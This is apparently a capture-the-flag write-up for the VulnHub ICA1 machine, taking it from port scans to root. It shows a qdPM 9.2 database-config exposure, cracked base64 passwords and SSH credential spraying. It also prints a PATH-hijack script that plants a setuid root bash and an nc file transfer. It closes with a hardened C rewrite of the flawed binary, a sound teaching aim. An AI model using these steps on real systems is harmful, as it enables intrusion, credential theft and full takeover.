Port scanning

┌──(mikannse㉿kali)-[~/vulnhub/ica1]
└─$ sudo nmap --min-rate=10000 -p- 192.168.56.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-22 15:32 CST
Nmap scan report for 192.168.56.136
Host is up (0.00063s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
33060/tcp open mysqlx
MAC Address: 08:00:27:20:F6:7B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 19.67 seconds
┌──(mikannse㉿kali)-[~/vulnhub/ica1]
└─$ sudo nmap -sT -sC -sV -O -p22,80,3306,33060 192.168.56.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-22 15:33 CST
Nmap scan report for 192.168.56.136
Host is up (0.00076s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 0e:77:d9:cb:f8:05:41:b9:e4:45:71:c1:01:ac:da:93 (RSA)
| 256 40:51:93:4b:f8:37:85:fd:a5:f4:d7:27:41:6c:a0:a5 (ECDSA)
|_ 256 09:85:60:c5:35:c1:4d:83:76:93:fb:c7:f0:cd:7b:8e (ED25519)
80/tcp open http Apache httpd 2.4.48 ((Debian))
|_http-title: qdPM | Login
|_http-server-header: Apache/2.4.48 (Debian)
3306/tcp open mysql MySQL 8.0.26
| mysql-info:
| Protocol: 10
| Version: 8.0.26
| Thread ID: 42
| Capabilities flags: 65535
| Some Capabilities: SwitchToSSLAfterHandshake, Support41Auth, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, LongPassword, DontAllowDatabaseTableColumn, ConnectWithDatabase, FoundRows, ODBCClient, SupportsTransactions, IgnoreSigpipes, InteractiveClient, Speaks41ProtocolOld, SupportsCompression, LongColumnFlag, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
| Status: Autocommit
| Salt: CA,.'yiU-u\x14FF*E`v43)
|_ Auth Plugin Name: caching_sha2_password
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=MySQL_Server_8.0.26_Auto_Generated_Server_Certificate
| Not valid before: 2021-09-25T10:47:29
|_Not valid after: 2031-09-23T10:47:29
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
| HY000
| LDAPBindReq:
| *Parse error unserializing protobuf message"
| HY000
| oracle-tns:
| Invalid message-frame."
|_ HY000
<SNIP>
┌──(mikannse㉿kali)-[~/vulnhub/ica1]
└─$ sudo nmap --script=vuln -p22,80,3306,33060 192.168.56.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-22 15:36 CST
Nmap scan report for 192.168.56.136
Host is up (0.00074s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.136
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.56.136:80/
| Form id: loginform
| Form action: http://192.168.56.136/index.php/login
|
| Path: http://192.168.56.136:80/index.php/login/restorePassword
| Form id: restorepassword
| Form action: /index.php/login/restorePassword
|
| Path: http://192.168.56.136:80/index.php/login
| Form id: loginform
|_ Form action: http://192.168.56.136/index.php/login
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /backups/: Backup folder w/ directory listing
| /robots.txt: Robots file
| /batch/: Potentially interesting directory w/ listing on 'apache/2.4.48 (debian)'
| /core/: Potentially interesting directory w/ listing on 'apache/2.4.48 (debian)'
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.48 (debian)'
| /images/: Potentially interesting directory w/ listing on 'apache/2.4.48 (debian)'
| /install/: Potentially interesting folder
| /js/: Potentially interesting directory w/ listing on 'apache/2.4.48 (debian)'
| /manual/: Potentially interesting folder
| /template/: Potentially interesting directory w/ listing on 'apache/2.4.48 (debian)'
|_ /uploads/: Potentially interesting directory w/ listing on 'apache/2.4.48 (debian)'
3306/tcp open mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
33060/tcp open mysqlx
MAC Address: 08:00:27:20:F6:7B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 34.31 seconds

Getshell

It is qdPM, a web project management tool, and the version shown at the bottom of the page is 9.2.

┌──(mikannse㉿kali)-[~/vulnhub]
└─$ searchsploit qdPM
<SNIP>
qdPM 9.2 - Cross-site Request Forgery (CSRF) | php/webapps/50854.txt
qdPM 9.2 - Password Exposure (Unauthenticated) | php/webapps/50176.txt
qdPM < 9.1 - Remote Code Execution | multiple/webapps/48146.py
------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

A search of historical vulnerabilities shows a password-exposure issue.

┌──(mikannse㉿kali)-[~/vulnhub]
└─$ cat 50176.txt
# Exploit Title: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)
# Date: 03/08/2021
# Exploit Author: Leon Trappett (thepcn3rd)
# Vendor Homepage: https://qdpm.net/
# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
# Version: 9.2
# Tested on: Ubuntu 20.04 Apache2 Server running PHP 7.4

The password and connection string for the database are stored in a yml file. To access the yml file you can go to http://<website>/core/config/databases.yml file and download.

Requesting /core/config/databases.yml returns the database configuration file.

all:
  doctrine:
    class: sfDoctrineDatabase
    param:
      dsn: 'mysql:dbname=qdpm;host=localhost'
      profiler: false
      username: qdpmadmin
      password: "<?php echo urlencode('UcVQCMQk2STVeS6J') ; ?>"
      attributes:
        quote_identifier: true

┌──(mikannse㉿kali)-[~/vulnhub]
└─$ echo "<?php echo urlencode('UcVQCMQk2STVeS6J') ; ?>" >1.php

┌──(mikannse㉿kali)-[~/vulnhub]
└─$ cat 1.php
<?php echo urlencode('UcVQCMQk2STVeS6J') ; ?>

┌──(mikannse㉿kali)-[~/vulnhub]
└─$ php -f 1.php
UcVQCMQk2STVeS6J

However, a MariaDB SSL certificate problem came up, and it took a long time to sort out.

┌──(mikannse㉿kali)-[~/vulnhub/ica1]
└─$ mysql -h 192.168.56.136 -u qdpmadmin -p
Enter password:
ERROR 2026 (HY000): TLS/SSL error: self-signed certificate in certificate chain

Adding a skip-SSL setting to the client configuration file fixes it.

┌──(mikannse㉿kali)-[~/vulnhub/ica1]
└─$ cat /etc/mysql/conf.d/mysql.cnf
[mysql]
skip_ssl

After connecting, there are two tables in the staff database: one holds usernames, the other what looks like base64-encoded passwords.

MySQL [staff]> select * from user;
+------+---------------+--------+---------------------------+
| id | department_id | name | role |
+------+---------------+--------+---------------------------+
| 1 | 1 | Smith | Cyber Security Specialist |
| 2 | 2 | Lucas | Computer Engineer |
| 3 | 1 | Travis | Intelligence Specialist |
| 4 | 1 | Dexter | Cyber Security Analyst |
| 5 | 2 | Meyer | Genetic Engineer |
+------+---------------+--------+---------------------------+
5 rows in set (0.001 sec)

MySQL [staff]> select * login;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login' at line 1
MySQL [staff]> select * from login;
+------+---------+--------------------------+
| id | user_id | password |
+------+---------+--------------------------+
| 1 | 2 | c3VSSkFkR3dMcDhkeTNyRg== |
| 2 | 4 | N1p3VjRxdGc0MmNtVVhHWA== |
| 3 | 1 | WDdNUWtQM1cyOWZld0hkQw== |
| 4 | 3 | REpjZVZ5OThXMjhZN3dMZw== |
| 5 | 5 | Y3FObkJXQ0J5UzJEdUpTeQ== |
+------+---------+--------------------------+

Build the username list, converting it to lowercase (uppercase usernames almost never occur on Linux).

┌──(mikannse㉿kali)-[~/vulnhub/ica1]
└─$ cat username |awk -F '|' '{print $4}' |tr -d " " |awk '{print tolower($0)}' >user

Build the password list.

┌──(mikannse㉿kali)-[~/vulnhub/ica1]
└─$ cat password|awk -F '|' '{print $4}' |tr -d " " >pass_base
┌──(mikannse㉿kali)-[~/vulnhub/ica1]
└─$ while IFS= read -r line; do echo -n "$line" | base64 -d; echo; done < pass_base >pass

Brute-force SSH.

┌──(mikannse㉿kali)-[~/vulnhub/ica1]
└─$ crackmapexec ssh 192.168.56.136 -u user -p pass --continue-on-success
SSH 192.168.56.136 22 192.168.56.136 [*] SSH-2.0-OpenSSH_8.4p1 Debian-5
<SNIP>
SSH 192.168.56.136 22 192.168.56.136 [+] travis:DJceVy98W28Y7wLg
SSH 192.168.56.136 22 192.168.56.136 [-] travis:cqNnBWCByS2DuJSy Authentication failed.
SSH 192.168.56.136 22 192.168.56.136 [-] dexter:suRJAdGwLp8dy3rF Authentication failed.
SSH 192.168.56.136 22 192.168.56.136 [+] dexter:7ZwV4qtg42cmUXGX
<SNIP>

Privilege escalation

A note was found on this user's desktop.

dexter@debian:~$ cat note.txt 
It seems to me that there is a weakness while accessing the system.
As far as I know, the contents of executable files are partially viewable.
I need to find out if there is a vulnerability or not

There is a SUID program, /opt/get_access.

dexter@debian:/$ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
-rwsr-xr-x 1 root root 16816 Sep 25 2021 /opt/get_access
-rwxr-sr-x 1 root shadow 31160 Feb 7 2020 /usr/bin/expiry
-rwsr-xr-x 1 root root 58416 Feb 7 2020 /usr/bin/chfn
<SNIP>

Transfer it to the local machine and decompile it.

┌──(mikannse㉿kali)-[~/vulnhub/ica1]
└─$ nc -lvnp 1234 >access
listening on [any] 1234 ...
connect to [192.168.56.131] from (UNKNOWN) [192.168.56.136] 53450
dexter@debian:/$ cat /opt/get_access |nc 192.168.56.131 1234

The main function:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  setuid(0);                         // binary is setuid root, so this succeeds
  setgid(0);
  system("cat /root/system.info");   // "cat" is relative: resolved via the caller's PATH
  if ( socket(2, 1, 0) == -1 )
    puts("Could not create socket to access to the system.");
  else
    puts("All services are disabled. Accessing to the system is allowed only within working hours.\n");
  return 0;
}

cat is not invoked with an absolute path, so the command can be hijacked through the environment: write a new cat in /tmp and put /tmp at the front of PATH.

dexter@debian:/tmp$ echo "cp /bin/bash /tmp/root_bash;chmod +xs /tmp/root_bash" >cat
dexter@debian:/tmp$ chmod +x cat
dexter@debian:/tmp$ export PATH=/tmp:$PATH
dexter@debian:/tmp$ /opt/get_access
All services are disabled. Accessing to the system is allowed only within working hours.

dexter@debian:/tmp$ ls
cat
root_bash
systemd-private-2d0996525c3c45a5a6b365c66867de64-apache2.service-a9Np8e
systemd-private-2d0996525c3c45a5a6b365c66867de64-systemd-logind.service-poqsxg
systemd-private-2d0996525c3c45a5a6b365c66867de64-systemd-timesyncd.service-3UXGFg
dexter@debian:/tmp$ ./root_bash -p
root_bash-5.1# whoami
root
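A hardened rewrite of get_access, added here as an example (it is not the binary from the VM): it reads /root/system.info in-process instead of calling system("cat ..."), so there is no shell and no PATH lookup to hijack, and it resets PATH to a fixed value anyway. TRUSTED_PATH and the function names are my own choices.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>

/* Fixed search path: a setuid program must never trust the caller's PATH. */
#define TRUSTED_PATH "/usr/sbin:/usr/bin:/sbin:/bin"
/* Copy the file at `path` to `out` in-process: no shell, no PATH lookup.
 * Returns the number of bytes copied, or -1 if the file cannot be opened. */
long cat_file(const char *path, FILE *out)
{
    FILE *f = fopen(path, "rb");
    if (f == NULL)
        return -1;
    char buf[4096];
    size_t n;
    long total = 0;
    while ((n = fread(buf, 1, sizeof buf, f)) > 0)
        total += (long)fwrite(buf, 1, n, out);
    fclose(f);
    return total;
}
/* Replace the inherited PATH with a known-good value; returns 0 on success.
 * Still worth doing even though nothing here execs: defence in depth. */
int harden_env(void)
{
    return setenv("PATH", TRUSTED_PATH, 1);
}
int main(void)
{
    if (harden_env() != 0)
        return 1;
    /* Same privilege model as the original: the binary is installed setuid root. */
    if (setuid(0) != 0 || setgid(0) != 0) {
        fputs("Insufficient privileges.\n", stderr);
        return 1;
    }
    if (cat_file("/root/system.info", stdout) < 0)
        fputs("Could not read system information.\n", stderr);
    int s = socket(AF_INET, SOCK_STREAM, 0); /* the original's socket(2, 1, 0) */
    if (s == -1) {
        puts("Could not create socket to access to the system.");
    } else {
        close(s);
        puts("All services are disabled. Accessing to the system is allowed only within working hours.\n");
    }
    return 0;
}
```

When auditing a host, the same defect is easy to spot without a decompiler: run strings on each setuid binary and look for system()/popen() arguments that start with a bare command name rather than an absolute path.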

Closing thoughts

Most of the time went into the certificate problem that appears when connecting after the MariaDB update...